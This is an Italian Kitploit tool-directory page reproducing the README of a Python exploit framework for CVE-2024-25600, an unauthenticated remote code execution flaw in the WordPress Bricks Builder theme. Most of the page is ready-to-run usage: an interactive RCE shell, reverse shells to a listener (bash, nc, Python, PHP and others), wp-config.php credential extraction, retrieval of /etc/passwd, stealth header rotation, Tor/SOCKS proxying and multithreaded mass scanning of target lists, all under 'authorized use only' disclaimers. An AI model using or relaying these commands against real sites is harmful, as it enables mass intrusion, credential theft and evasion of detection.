Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
WP-Bricks-Exploit-CVE-2024-25600 — CVE-2024-25600 - Exploit RCE non autenticato per il tema WordPress Bricks Builder. Framework di sfruttamento avanzato con shell interattiva, reverse shell, upload/download di file, scansione asincrona, modalità stealth, supporto proxy e scansione di vulnerabilità multi-thread. Solo per test di sicurezza autorizzati. | Kitploit
Strumenti/GitHubGitHub/cerberusmrxi/wp-bricks-exploit-cve-2024-25600
RicognizioneScanner di VulnerabilitàExploitShellcodeSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingCommand and ControlRed Teaming

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Sviluppo Payload
GitHubcerberusmrxi/wp-bricks-exploit-cve-2024-25600

WP-Bricks-Exploit-CVE-2024-25600

Vedi Repository
111 mese faNon ancora revisionato

Informazioni

CVE-2024-25600 - Exploit RCE non autenticato per il tema WordPress Bricks Builder. Framework di sfruttamento avanzato con shell interattiva, reverse shell, upload/download di file, scansione asincrona, modalità stealth, supporto proxy e scansione di vulnerabilità multi-thread. Solo per test di sicurezza autorizzati.

Condividi

BricksRCE Exploiter

CVE-2024-25600 — WordPress Bricks Builder RCE non autenticato

Python Versione CVSS CVE Licenza Piattaforma

Strumento di valutazione della sicurezza autorizzato per CVE-2024-25600
Autore: Sudeepa Wanigarathna · Strumento: BricksRCE Exploiter v1.0
Script principale: cve-2024-25600.py

b

[!IMPORTANT] Solo uso autorizzato. Questo strumento è destinato a ricerca sulla sicurezza, formazione e test di sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta. L'accesso non autorizzato a sistemi informatici è illegale. L'autore non si assume alcuna responsabilità per uso improprio.


Sommario

  • Panoramica
  • Dettagli della vulnerabilità
  • Funzionalità
  • Installazione
  • Avvio rapido
  • Guida all'uso
  • Riferimento dei comandi
  • Shell interattiva
  • Output e logging
  • Risoluzione dei problemi
  • Struttura del repository
  • Cronologia versioni
  • Disclaimer
  • Autore e crediti
  • Licenza

Panoramica

CVE-2024-25600 è una vulnerabilità critica di esecuzione di codice remoto non autenticato nel tema WordPress Bricks Builder. La gestione impropria dell'input controllato dall'utente nell'endpoint REST render_element consente ad attaccanti non autenticati di eseguire comandi PHP/di sistema arbitrari sulle installazioni vulnerabili.

BricksRCE Exploiter (cve-2024-25600.py) è uno strumento di valutazione Python completo per professionisti della sicurezza autorizzati per:

  • Rilevare installazioni vulnerabili di Bricks Builder
  • Validare l'impatto con esecuzione controllata di comandi
  • Interagire con host compromessi tramite una shell interattiva
  • Eseguire scansioni di massa di elenchi di target con worker asincroni/thread
  • Esportare risultati strutturati per la reportistica

Dettagli della vulnerabilità

AttributoValore
CVE IDCVE-2024-25600
CVSS9.8 (Critico)
Vettore d'attaccoRete — non autenticato
ImpattoEsecuzione di codice remoto totale, compromissione di riservatezza / integrità / disponibilità
Prodotto interessatoTema WordPress Bricks Builder
Versioni interessateBricks ≤ 1.9.6 (corretto in 1.9.6.1+)
Tipo di vulnerabilitàEsecuzione di codice remoto non autenticata
CWECWE-94 (Controllo improprio della generazione del codice)

Endpoint interessati

EndpointMetodo
/wp-json/bricks/v1/render_elementPOST
/?rest_route=/bricks/v1/render_elementPOST

Riepilogo dell'attacco

  1. Estrarre un nonce di Bricks dal sorgente della pagina target
  2. Inviare una richiesta render_element manipolata con un payload di elemento malevolo
  3. La valutazione del codice lato server porta all'esecuzione di comandi arbitrari

Riferimenti

  • CVE-2024-25600 (MITRE)
  • Voce NVD
  • Changelog / Avviso di sicurezza di Bricks Builder

Funzionalità

Capacità principali

CapacitàDescrizione
Rilevamento vulnerabilitàConferma RCE tramite sonda basata su marker controllato
Estrazione nonceScoperta nonce multi-metodo (script, sorgente pagina, meta, REST)
Rilevamento versioneIdentifica versione di Bricks Builder da CSS / readme / REST
Shell interattivaREPL completo con cronologia, completamento automatico e trasferimento file
Modalità comando singoloEsegue un comando e termina (adatto a script)
Helper shell inversaGenera shell inverse bash / nc / Python / PHP / Perl / Ruby
Estrazione wp-configTenta di localizzare e leggere wp-config.php
Scansione di massaScansione multi-target asincrona o con thread da un elenco di URL

Controlli operativi

CapacitàDescrizione
Limitazione della velocitàRitardo configurabile tra le richieste
Logica di ripetizioneBackoff esponenziale su timeout ed errori di connessione
Rotazione User-AgentImpronte digitali casuali del browser per richiesta
Modalità stealthIntestazioni Accept-Language / Accept-Encoding randomizzate
Supporto proxyHTTP, HTTPS, SOCKS5 / SOCKS5h
Doppi endpointPreferisce wp-json, rest_route o entrambi
Modalità forzataSalta il pre-controllo e tenta lo sfruttamento direttamente
CLI riccaBarre di avanzamento, tabelle e pannelli colorati tramite Rich

Reportistica

CapacitàDescrizione
Esportazione JSON / TXTSalva risultati di scansione e target vulnerabili
Cronologia comandiRegistrazione opzionale dei comandi eseguiti
Log su filebricks_rce.log persistente più percorsi di log personalizzati

Installazione

Prerequisiti

  • Python 3.8+
  • pip
  • Raggiungibilità di rete del/i target autorizzato/i

Configurazione

root@kitploit:~
git clone https://github.com/CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600.git
cd WP-Bricks-Exploit-CVE-2024-25600

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 cve-2024-25600.py --help

Dipendenze

root@kitploit:~
requests>=2.31.0
aiohttp>=3.9.0
beautifulsoup4>=4.12.0
lxml>=4.9.0
prompt-toolkit>=3.0.0
rich>=13.7.0
pysocks>=1.7.0          # opzionale — supporto proxy SOCKS5

Avvio rapido

Sostituisci https://target.example con un target di laboratorio o autorizzato solo.

root@kitploit:~
# Shell interattiva
python3 cve-2024-25600.py -u https://target.example

# Comando singolo
python3 cve-2024-25600.py -u https://target.example --cmd "id"

# Scansione di massa
python3 cve-2024-25600.py -f targets.txt -t 20 -o results.json

# Rilevamento versione
python3 cve-2024-25600.py -u https://target.example --detect-version

# Tramite proxy Burp
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v

Guida all'uso

Tutti gli esempi utilizzano lo script principale: cve-2024-25600.py

1. Mostrare l'aiuto

root@kitploit:~
python3 cve-2024-25600.py --help

2. Shell interattiva su singolo target

Apre una shell RCE interattiva dopo aver confermato che il target è vulnerabile.

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example

Flusso di lavoro:

  1. Normalizzare e validare l'URL
  2. Estrarre il nonce dalla pagina
  3. Verificare la vulnerabilità (a meno che non si usi --force)
  4. Entrare in una shell interattiva

3. Eseguire un singolo comando

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --cmd "whoami"

Salvare l'output del comando in un file:

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --cmd "id" --save-output

4. Scegliere il tipo di payload

root@kitploit:~
# Payload predefinito basato su eccezione PHP
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload php

# Payload basato su system()
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload system

5. Rilevare la versione di Bricks Builder

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --detect-version

Combinare con un comando:

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --detect-version --cmd "id"

6. Estrarre wp-config.php

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --extract-wp-config

Salvato come wp-config_<target>.txt in caso di successo.

7. Shell inverse (solo laboratorio autorizzato)

root@kitploit:~
# Terminale 1 — ascoltatore
nc -lvnp 4444

# Terminale 2 — shell inversa bash
python3 cve-2024-25600.py -u https://target.example \
  --reverse-shell bash \
  --lhost 10.0.0.5 \
  --lport 4444

Tutti i tipi di shell inversa supportati:

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --reverse-shell bash   --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell nc     --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell python --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell php    --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell perl   --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell ruby   --lhost 10.0.0.5 --lport 4444

8. Modalità forzata (salta controllo vulnerabilità)

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --force --cmd "uname -a"

9. Scansione di massa da file

root@kitploit:~
# targets.txt — un URL per riga
python3 cve-2024-25600.py -f targets.txt

Con thread, ritardo, stealth e output JSON:

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt \
  -t 15 \
  --delay 0.5 \
  --stealth \
  -o vulnerable.json

Scansione sincrona (pool di thread) invece di asincrona:

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt --sync -t 10 -o results.txt

Scansione di massa silenziosa:

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt -q -o results.json

10. Selezione endpoint

root@kitploit:~
# Entrambi gli endpoint (predefinito)
python3 cve-2024-25600.py -u https://target.example --endpoint both

# Solo /wp-json/bricks/v1/render_element
python3 cve-2024-25600.py -u https://target.example --endpoint json

# Solo /?rest_route=/bricks/v1/render_element
python3 cve-2024-25600.py -u https://target.example --endpoint rest_route

11. Modalità stealth

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example \
  --stealth \
  --delay 1.0 \
  --max-retries 5 \
  --timeout 20

12. User-Agent personalizzato

root@kitploit:~
# UA personalizzato
python3 cve-2024-25600.py -u https://target.example \
  --user-agent "Mozilla/5.0 (compatible; SecurityScanner/1.0)"

# Disabilita rotazione UA casuale
python3 cve-2024-25600.py -u https://target.example --no-random-ua

13. Supporto proxy

root@kitploit:~
# Proxy HTTP (es. Burp Suite)
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v

# Proxy SOCKS5
python3 cve-2024-25600.py -u https://target.example --proxy socks5://127.0.0.1:9050

# SOCKS5h (DNS tramite proxy / Tor)
python3 cve-2024-25600.py -u https://target.example --proxy socks5h://127.0.0.1:9050

14. Verifica SSL

root@kitploit:~
# Abilita verifica certificato SSL (disabilitata per impostazione predefinita)
python3 cve-2024-25600.py -u https://target.example --verify-ssl

15. Output e logging

root@kitploit:~
# Salva risultati scansione come JSON
python3 cve-2024-25600.py -f targets.txt -o results.json

# Salva risultati scansione come TXT
python3 cve-2024-25600.py -f targets.txt -o results.txt

# File di log applicativo personalizzato
python3 cve-2024-25600.py -u https://target.example --log-file assessment.log -v

# Log dei comandi eseguiti
python3 cve-2024-25600.py -u https://target.example --command-log commands.log --cmd "id"

16. Modalità verbose e silenziosa

root@kitploit:~
# Logging verbose / debug
python3 cve-2024-25600.py -u https://target.example -v

# Modalità silenziosa (output minimo)
python3 cve-2024-25600.py -u https://target.example -q --cmd "id"

17. Ottimizzazione delle prestazioni

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt \
  -t 25 \
  --timeout 20 \
  --delay 0.2 \
  --max-retries 5 \
  -o results.json

18. Esempio di valutazione completa combinata

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example \
  --detect-version \
  --extract-wp-config \
  --stealth \
  --delay 0.8 \
  --timeout 20 \
  --max-retries 5 \
  --endpoint both \
  --proxy http://127.0.0.1:8080 \
  --log-file bricks_assessment.log \
  --command-log commands.log \
  -v

19. Comandi integrati della shell interattiva

Dopo l'avvio con -u (senza --cmd / --reverse-shell):

root@kitploit:~
Shell> whoami
Shell> id
Shell> pwd
Shell> ls -la
Shell> help
Shell> clear
Shell> download /etc/passwd
Shell> upload ./local.txt /tmp/remote.txt
Shell> php id
Shell> system uname -a
Shell> exit

Riferimento dei comandi

Opzioni target

ArgomentoDescrizione
-u, --urlURL del singolo target
-f, --fileFile contenente URL target (uno per riga)

Opzioni di scansione

ArgomentoPredefinitoDescrizione
-t, --threads10Worker concorrenti per scansioni di massa
--delay0.5Ritardo tra le richieste (secondi)
--timeout15Timeout richiesta HTTP (secondi)
--max-retries3Tentativi di ripetizione in caso di fallimento
--forcedisattivatoSalta controllo vulnerabilità
--syncdisattivatoUsa pool di thread invece di asincrono

Opzioni stealth

ArgomentoDescrizione
--user-agentStringa User-Agent personalizzata
--no-random-uaDisabilita rotazione User-Agent
--proxyURL proxy (http://, https://, socks5://, socks5h://)
--stealthAbilita modalità stealth (intestazioni casuali + ritardi)
--endpointjson | rest_route | both (predefinito: both)

Opzioni di sfruttamento

ArgomentoDescrizione
--cmdEsegue un singolo comando e termina
--payloadTipo di payload: php (predefinito) o system
--reverse-shellTipo di shell: bash, nc, python, php, perl, ruby
--lhostHost dell'ascoltatore per shell inversa
--lportPorta dell'ascoltatore per shell inversa
--extract-wp-configTenta di estrarre wp-config.php
--detect-versionRileva versione di Bricks Builder
--save-outputSalva output del singolo comando in un file

Opzioni di output

ArgomentoDescrizione
-o, --outputFile risultati (.json o .txt)
--log-filePercorso log dettagliato personalizzato
--command-logRegistra comandi eseguiti in un file
-v, --verboseLogging di debug
-q, --quietOutput console minimo
--verify-sslAbilita verifica certificato SSL (disabilitato per impostazione predefinita)

Shell interattiva

Quando si sfrutta un singolo target senza --cmd o --reverse-shell, si apre una shell interattiva:

root@kitploit:~
Shell> whoami
www-data

Shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell> help

Comandi integrati

ComandoDescrizione
exitEsce dalla shell
helpMostra aiuto
clearPulisce lo schermo
download [remoto]Scarica un file remoto (trasferimento base64)
upload [locale] [remoto]Carica un file locale sul target
php [comando]Esegue tramite payload PHP (predefinito)
system [comando]Esegue tramite payload system()

Funzionalità

  • Cronologia comandi persistente in ~/.bricks_rce_history
  • Completamento automatico per comandi comuni
  • Suggerimenti automatici dalla cronologia (prompt-toolkit)

Output e logging

Console

Pannelli, barre di avanzamento e tabelle dei risultati basati su Rich:

root@kitploit:~
[*] Test: https://target.example
[+] https://target.example è vulnerabile!
[+] Shell interattiva aperta con successo

Tabella dei risultati della scansione

MetricaDescrizione
Totale elaboratiURL scansionati
RiuscitiConfermati vulnerabili
FallitiNon vulnerabili / irraggiungibili
Vulnerabili trovatiConteggio target RCE confermati
Comandi eseguitiNumero totale di esecuzioni comando RCE
Tempo trascorsoDurata scansione a orologio

Esportazione JSON (-o results.json)

root@kitploit:~
{
  "timestamp": "2026-07-17T01:30:00",
  "version": "1.0.0",
  "config": {
    "threads": 10,
    "timeout": 15,
    "delay": 0.5
  },
  "stats": {
    "processed": 100,
    "vulnerable": 3,
    "failed": 97
  },
  "vulnerable_targets": [
    {
      "url": "https://target.example",
      "timestamp": "2026-07-17T01:31:12"
    }
  ]
}

File di log

FileScopo
bricks_rce.logLog applicativo predefinito con append
--log-file PATHGestore log personalizzato aggiuntivo
--command-log PATHTracciamento comandi eseguiti

Risoluzione dei problemi

SintomoCosa provare
Nonce non trovatoConferma che Bricks sia attivo; prova -v; assicurati che la pagina principale carichi
Target non vulnerabileVerifica Bricks ≤ 1.9.6; prova --force; controlla entrambi gli endpoint
Timeout di connessioneAumenta --timeout / --max-retries; controlla il proxy
Limitazione velocità (429)Aumenta --delay; abilita --stealth
Errori SSLPer impostazione predefinita salta verifica; usa --verify-ssl solo se necessario
Instabilità asincronaUsa --sync per scansione con thread
Shell inversa fallisceConferma che l'ascoltatore sia attivo; prova tipi di shell alternativi (python, nc)
Output comando vuotoIl comando potrebbe essere riuscito senza stdout; prova echo test
wp-config non trovatoI percorsi variano per host; usa shell interattiva con find / cat personalizzato

Flusso di lavoro di debug

root@kitploit:~
# Controllo verbose su singolo target
python3 cve-2024-25600.py -u https://target.example --detect-version -v

# Tramite Burp per ispezione richieste
python3 cve-2024-25600.py -u https://target.example \
  --proxy http://127.0.0.1:8080 -v --cmd "id"

# Preferisci un endpoint specifico
python3 cve-2024-25600.py -u https://target.example --endpoint json -v

Struttura del repository

root@kitploit:~
exploit/
├── cve-2024-25600.py     # BricksRCE Exploiter (v1.0)
├── requirements.txt      # Dipendenze Python
├── README.md             # Questo file
├── bricks_rce.log        # Log di runtime (generato)
└── venv/                 # Virtualenv locale (opzionale, non committato)

Cronologia versioni

v1.0.0 — Versione iniziale

  • Rilevamento e sfruttamento RCE non autenticato per CVE-2024-25600
  • Estrazione nonce multi-metodo
  • Shell interattiva con upload / download
  • Modalità comando singolo e shell inversa
  • Scansione di massa asincrona / con thread
  • Rilevamento versione ed estrazione wp-config
  • Modalità stealth, rotazione UA, supporto proxy
  • CLI ricca con esportazione risultati JSON/TXT

Disclaimer

Questo progetto è fornito così com'è per ricerca sulla sicurezza difensiva e test di penetrazione autorizzati.

Usando questo software accetti che:

  1. Prenderai di mira solo sistemi di tua proprietà o per cui sei esplicitamente autorizzato a testare.
  2. Comprendi le leggi applicabili sull'abuso informatico e sulla protezione dei dati.
  3. L'autore e i collaboratori non sono responsabili per danni, perdita di dati o conseguenze legali derivanti da uso improprio.

Se scopri questa vulnerabilità in ambienti di produzione che non possiedi, segui le pratiche di divulgazione responsabile e coordina con il proprietario del sito / il team di sicurezza di Bricks Builder.

L'accesso non autorizzato a sistemi informatici è un reato federale.


Autore e crediti

RuoloNome
Autore dello strumentoSudeepa Wanigarathna
CVECVE-2024-25600
StrumentoBricksRCE Exploiter v1.0
Script principalecve-2024-25600.py
LicenzaMIT

Licenza

root@kitploit:~
Licenza MIT

Copyright (c) 2024–2026 Sudeepa Wanigarathna

Con la presente viene concessa autorizzazione, gratuitamente, a chiunque ottenga una copia
di questo software e dei file di documentazione associati (il "Software"), di trattare
il Software senza restrizioni, inclusi, senza limitazione, i diritti
di utilizzare, copiare, modificare, unire, pubblicare, distribuire, concedere in sublicenza e/o vendere
copie del Software, e di consentire alle persone a cui il Software è
fornito di fare altrettanto, alle seguenti condizioni:

L'avviso di copyright sopra indicato e questo avviso di autorizzazione devono essere inclusi in tutte le
copie o parti sostanziali del Software.

IL SOFTWARE VIENE FORNITO "COSÌ COM'È", SENZA GARANZIA DI ALCUN TIPO, ESPRESSA O
IMPLICITA, IVI COMPRESE, MA SENZA LIMITAZIONE, LE GARANZIE DI COMMERCIABILITÀ,
IDONEITÀ PER UNO SCOPO PARTICOLARE E NON VIOLAZIONE. IN NESSUN CASO GLI AUTORI O I TITOLARI DEL COPYRIGHT
POTRANNO ESSERE RITENUTI RESPONSABILI PER QUALSIASI RECLAMO, DANNO O ALTRA
RESPONSABILITÀ, SIA IN UN'AZIONE CONTRATTUALE, EXTRACONTRATTUALE O ALTRO, DERIVANTE DA,
O IN CONNESSIONE CON IL SOFTWARE O L'USO O ALTRE OPERAZIONI NEL SOFTWARE.

Supporto

  • Metti una stella al repository se aiuta la tua ricerca autorizzata
  • Apri issue per bug, falsi positivi o miglioramenti del rilevamento
  • Pull request benvenute per documentazione e UX di laboratorio autorizzato

Solo per test di sicurezza autorizzati.

Scarica lo strumento